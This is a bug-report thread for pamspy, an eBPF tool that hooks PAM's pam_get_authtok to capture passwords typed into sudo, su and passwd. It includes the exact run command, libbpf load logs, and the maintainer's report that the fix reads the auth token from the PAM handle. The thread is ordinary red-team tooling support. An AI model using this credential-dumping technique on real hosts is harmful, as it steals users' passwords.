Password not dumped within Kali VM

[ariary]

Issue:

• Compilation Ok, execution Ok
• Correctly catch sudo, su, etc command
• Correctly catch user initiating the command
• Do not catch the password used

Output example:

2071   | sudo            | kali                 | 
3313   | sudo            | kali                 | 
4137   | sudo            | kali                 | 
4223   | passwd          | test                 | 

Additional information:

New to eBPF stuff etc, so I can not find what cause this for now.

• Kali is running on VM

$ uname -a
Linux kali 5.15.0-kali3-amd64 #1 SMP Debian 5.15.15-2kali1 (2022-01-31) x86_64 GNU/Linux
$ /usr/sbin/ldconfig -p | grep libpam.so | cut -d ' ' -f4
/lib/x86_64-linux-gnu/libpam.so.0
$ sudo ./pamspy -p $(/usr/sbin/ldconfig -p | grep libpam.so | cut -d ' ' -f4) -v
libbpf: loading object 'pamspy_bpf' from buffer
libbpf: elf: section(2) uretprobe/pam_get_authtok, size 392, link 0, flags 6, type=1
libbpf: sec 'uretprobe/pam_get_authtok': found program 'trace_pam_get_authtok' at insn offset 0 (0 bytes), code size 49 insns (392 bytes)
libbpf: elf: section(3) license, size 13, link 0, flags 3, type=1
libbpf: license of pamspy_bpf is Dual BSD/GPL
libbpf: elf: section(4) .maps, size 16, link 0, flags 3, type=1
libbpf: elf: section(5) .BTF, size 1566, link 0, flags 0, type=1
libbpf: elf: section(6) .BTF.ext, size 572, link 0, flags 0, type=1
libbpf: elf: section(7) .symtab, size 144, link 12, flags 0, type=2
libbpf: elf: section(8) .reluretprobe/pam_get_authtok, size 16, link 7, flags 0, type=9
libbpf: looking for externs among 6 symbols...
libbpf: collected 0 externs total
libbpf: map 'rb': at sec_idx 4, offset 0.
libbpf: map 'rb': found type = 27.
libbpf: map 'rb': found max_entries = 262144.
libbpf: sec '.reluretprobe/pam_get_authtok': collecting relocation for section(2) 'uretprobe/pam_get_authtok'
libbpf: sec '.reluretprobe/pam_get_authtok': relo #0: insn #21 against 'rb'
libbpf: prog 'trace_pam_get_authtok': found map 0 (rb, sec 4, off 0) for insn #21
libbpf: loading kernel BTF '/sys/kernel/btf/vmlinux': 0
libbpf: map 'rb': created successfully, fd=4
libbpf: sec 'uretprobe/pam_get_authtok': found 3 CO-RE relocations
libbpf: CO-RE relocating [10] struct pt_regs: found target candidate [174] struct pt_regs in [vmlinux]
libbpf: prog 'trace_pam_get_authtok': relo #0: <byte_off> [10] struct pt_regs.di (0:14 @ offset 112)
libbpf: prog 'trace_pam_get_authtok': relo #0: matching candidate #0 <byte_off> [174] struct pt_regs.di (0:14 @ offset 112)
libbpf: prog 'trace_pam_get_authtok': relo #0: patched insn #1 (LDX/ST/STX) off 112 -> 112
libbpf: prog 'trace_pam_get_authtok': relo #1: <byte_off> [10] struct pt_regs.dx (0:12 @ offset 96)
libbpf: prog 'trace_pam_get_authtok': relo #1: matching candidate #0 <byte_off> [174] struct pt_regs.dx (0:12 @ offset 96)
libbpf: prog 'trace_pam_get_authtok': relo #1: patched insn #3 (LDX/ST/STX) off 96 -> 96
libbpf: prog 'trace_pam_get_authtok': relo #2: <byte_off> [10] struct pt_regs.dx (0:12 @ offset 96)
libbpf: prog 'trace_pam_get_authtok': relo #2: matching candidate #0 <byte_off> [174] struct pt_regs.dx (0:12 @ offset 96)
libbpf: prog 'trace_pam_get_authtok': relo #2: patched insn #9 (LDX/ST/STX) off 96 -> 96
[...]

[cr4m05]

For me the same problem, I can't dump credentials of Kali VM (or WSL) and Arch VM.

[citronneur]

Thanks ! I fixed it in the new release!

[citronneur]

It was due to the way of your pam config manage auth token. So I decided to retrieve token directly from the handler. Thanks for sharing it's really appreciate.

[citronneur]

Let me know if it's ok for you?

[cr4m05]

Done!
It's working now. Thanks!!

[ariary]

Works like a charm! Thank you for the tool and your reactivity